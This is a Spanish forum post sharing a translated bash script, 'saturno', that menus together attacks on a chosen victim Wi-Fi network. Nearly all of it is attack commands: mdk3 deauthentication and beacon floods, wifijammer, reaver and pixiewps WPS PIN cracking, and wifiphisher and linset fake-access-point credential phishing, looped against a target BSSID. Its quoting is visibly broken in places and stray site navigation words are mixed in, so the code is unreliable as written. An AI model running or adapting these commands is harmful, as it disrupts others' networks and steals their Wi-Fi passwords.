Me he encontrado esto por hay y lo he traducido "mas o menos" por si lo quereis para algo.
#!/bin/bash
#saturno wps wpa wpa2
#
# Copyright (c) 2015, saturno
#
# DISCLAIMER: This tool was made for educational purposes only.
# The author is NOT responsible for any misuse or abuse.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the
# OpenSSL library under certain conditions as described in each
# individual source file, and distribute linked combinations
# including the two.
# You must obey the GNU General Public License in all respects
# for all of the code used other than OpenSSL. If you modify
# file(s) with this exception, you may extend this exception to your
# version of the file(s), but you are not obligated to do so. If you
# do not wish to do so, delete this exception statement from your
# version. If you delete this exception statement from all source
# files in the program, then also delete it here.
menu () {
##### CONSTANTES #####
#COLORES
negro="\033[0;30m"
rojo="\033[0;31m"
verde="\033[0;32m"
marron="\033[0;33m"
azul="\033[0;34m"
magenta="\033[0;35m"
cyan="\033[01;36m"
grisC="\033[0;37m"
gris="\033[1;30m"
rojoC="\033[1;31m"
verdeC="\033[1;32m"
amarillo="\033[1;33m"
azulC="\033[1;34m"
magentaC="\033[1;35m"
cyanC="\033[1;36m"
blanco="\033[1;37m"
subrayar="\E[4m"
parpadeoON="\E[5m"
parpadeoOFF="\E[0m"
resaltar="\E[7m"
clear
echo -e "\n\n"$gris" "Copyright v5" "$gris" "$rojo"BIENVENIDO A SATURNO "$"WPS WPA WPA2"
echo " 1: iniciar saturno \c"
echo " 2: mdk3 lanzar v1 \c"
echo " 3: mdk3 lanzar v2 \c"
echo "
4: mdk3 lanzar v3 \c"
echo " 5: wpa wpa2 con wifiphisher \c"
echo "
6: reaver 1.5 con pixiewps v1 \c"
echo "
7: reaver 1.5 con pixiewps v2 \c"
echo " 8: linset wpa wpa2 \c"
echo " 9: reavermod \c"
read choice
case $choice in
1)scan;;
2)attack;;
3)attack2;;
4)attack3;;
5)attack4;;
6)attack5;;
7)attack6;;
8)attack7;;
9)attack8;;
esac
}
scan () {
echo "\n Por favor ingresa tu interface ( wlan0 o wlan1 ) : \c"
read interface ;
monitors
echo "\n Por favor ingresa tu BSSID & ESSID & canal de la victima \n";
echo " Esperar que esto termine en 10 segundos \n";
gnome-terminal -e "timeout 80s airodump-ng --wps mon0 ";
gnome-terminal -e "timeout 60s airodump-ng mon0 ";
sleep 20s
menu
}
attack () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/cracklog.txt >> /dev/null ;
xterm -e timeout 2m mdk3 mon1 b mdk3test.txt -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon2 -b mdk3test.txt -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon3 -b mdk3test.txt -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon4 a -a x 0 -t "$bssid" -n -g -m -s 500 &
xterm -e timeout 2m mdk3 mon5 a -a x 0 -t "$bssid" -n -g -m -s 500 &
xterm -e timeout 2m mdk3 mon6 a -a x 0 -t "$bssid" -n -g -m -s 500 &
reaver -i -b "$bssid" -vv -a -S -N -r 2:60 >> reaverlog.txt &
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 5m
done
}
attack2 () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/reaverlog.txt >> /dev/null ;
xterm -e airodump-ng -i mon0 -c $channel --bssid "$bssid" &
xterm -e airodump-ng -i mon0 -c $channel --bssid "$bssid" &
xterm -e timeout 2m mdk3 mon1 a -a "$bssid" &
xterm -e timeout 2m mdk3 mon2 d -c X &
xterm -e timeout 2m mdk3 mon3 d -c X &
xterm -e timeout 2m mdk3 mon4 d -c X &
xterm -e timeout 2m mdk3 mon5 -b -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon6 -b -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon7 -b -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon8 m -t "$bssid"
xterm -e "timeout 2m mdk3 mon9 a -t "$bssid" -e "$essid" -s 5000 " &
xterm -e "timeout 2m mdk3 mon10 a -t "$bssid" -e "$essid" -s 5000 " &
xterm -e "timeout 2m mdk3 mon11 b -t "$bssid" -e "$essid" -s 5000" &
xterm -e "timeout 2m mdk3 mon12 b -t "$bssid" -e "$essid" -s 5000" &
reaver -i mon0 -b"$bssid" -vvv >> reaverlog.txt &
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 5m
done
}
attack3 () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/reaverlog.txt >> /dev/null ;
xterm -e timeout 1m mdk3 mon0 a "$bssid" d -b mdk3.txt -c $channel &
xterm -e timeout 1m mdk3 mon1 a -a "$bssid"
xterm -e timeout 1m mdk3 mon2 -w white.txt" &
xterm -e timeout 1m mdk3 mon3 d -w white.txt -c $channel" &
xterm -e "timeout 2m mdk3 mon4 a -t "$bssid" -e "$essid" -s 100" &
xterm -e "timeout 2m mdk3 mon5 a -t "$bssid" -e "$essid" -s 100" &
xterm -e "timeout 2m mdk3 mon6 b -t "$bssid" -e "$essid" -s 100" &
xterm -e "timeout 2m mdk3 mon7 b -t "$bssid" -e "$essid" -s 100" &
reaver -i mon0 -b "$bssid" -P -vvv >> reaverlog.txt &
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 5m
done
}
attack4 () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/reaverlog.txt >> /dev/null ;
xterm -e timeout 2m mdk3 mon1 a -a "$bssid"
xterm -e timeout 2m mdk3 mon2 x 0 -t "$bssid" -n "$essid" -s 500 &
xterm -e timeout 2m mdk3 mon3 x 0 -t "$bssid" -n "$essid" -s 500 &
xterm -e timeout 2m mdk3 mon4 x 0 -t "$bssid" -n "$essid" -s 500 &
xterm -e timeout 2m mdk3 mon5 b -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon6 b -t "$bssid" -c X
xterm -e timeout 2m mdk3 mon7 b -t "$bssid" -c X
xterm -e timeout 2m mdk3 mon8 m -t "$bssid"
xterm -e timeout 2m wifijammer.py
xterm -e wifiphisher.py -c $channel -jI wlan0 -jI wlan1 -aI mon0 -m 10 -n -m 10 -n -t 0,00001 -p 10 -d -a "$bssid" &
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 5m
done
}
attack5 () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/reaverlog.txt >> /dev/null ;
xterm -e timeout 3m mdk3 mon1 b mdk3test.txt -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon2 -b mdk3test.txt -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon3 -b mdk3test.txt -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon4 a -a x 0 -t "$bssid" -n -g -m -s 5000 &
xterm -e timeout 3m mdk3 mon5 a -a x 0 -t "$bssid" -n -g -m -s 500 &
xterm -e timeout 3m mdk3 mon6 a -a x 0 -t "$bssid" -n -g -m -s 100 &
reaver -i mon0 -c $channel -b "$bssid" -e "$essid" -P -vvv -K 1 >> reaverlog.txt &
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 5m
done
}
attack6 () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/reaverlog.txt >> /dev/null ;
xterm -e timeout 2m mdk3 mon0 a -a "$bssid" &
xterm -e timeout 2m mdk3 mon0 d -c X &
xterm -e timeout 2m mdk3 mon0 d -c X &
xterm -e timeout 2m mdk3 mon0 d -c X &
xterm -e timeout 2m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 2m mdk3 mon0 m -t "$bssid"
reaver -i mon0 -c $channel -b "$bssid" -e "$essid" -P -L -vvv -K 1 >> reaverlog.txt &
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 5m
done
}
attack7 () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/reaverlog.txt >> /dev/null ;
xterm -e timeout 3m mdk3 mon0 a -a "$bssid" &
xterm -e timeout 3m mdk3 mon0 d -c X &
xterm -e timeout 3m mdk3 mon0 d -c X &
xterm -e timeout 3m mdk3 mon0 d -c X &
xterm -e timeout 3m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon0 m -t "$bssid"
xterm -e timeout 2m wifijammer.py
xterm -e linset
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 5m
done
}
attack8 () {
read -p " Por favor Ingresa el ESSID : " essid ;
read -p " Por favor ingresa el BSSID : " bssid ;
read -p " Por favor ingresa el canal : " channel ;
echo
while true
do
rm -f /usr/local/bin/reaverlog.txt >> /dev/null ;
xterm -e timeout 3m mdk3 mon0 a -a "$bssid" &
xterm -e timeout 3m mdk3 mon0 d -c X &
xterm -e timeout 3m mdk3 mon0 d -c X &
xterm -e timeout 3m mdk3 mon0 d -c X &
xterm -e timeout 3m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon0 b -t "$bssid" -c X &
xterm -e timeout 3m mdk3 mon0 m -t "$bssid"
reavermod -i mon0 -c $channel -b "$bssid" -e "$essid" -vv
tail -f reaverlog.txt &
if
tail -f reaverlog.txt | grep -q Detected
then
killall reaver
killall wash
killall tail
fi
killall airodump-ng &
sleep 3m
done
}
cleaner () { i="1";
while [ $i -lt 15 ];
do
airmon-ng stop mon$i >> /dev/null
i=$((i+1))
done }
monitors () {
echo "\n
airmon-ng start $interface >> /dev/null
airmon-ng start $interface >> /dev/null
airmon-ng start $interface >> /dev/null
airmon-ng start $interface >> /dev/null
airmon-ng start $interface >> /dev/null
airmon-ng start $interface >> /dev/null
airmon-ng start $interface >> /dev/null
airmon-ng start $interface >> /dev/null
echo "\n
}
menu
Status
API
Training
Shop
Blog
About
Guardadlo como un .sh "Por si los despistados"
Un saludo.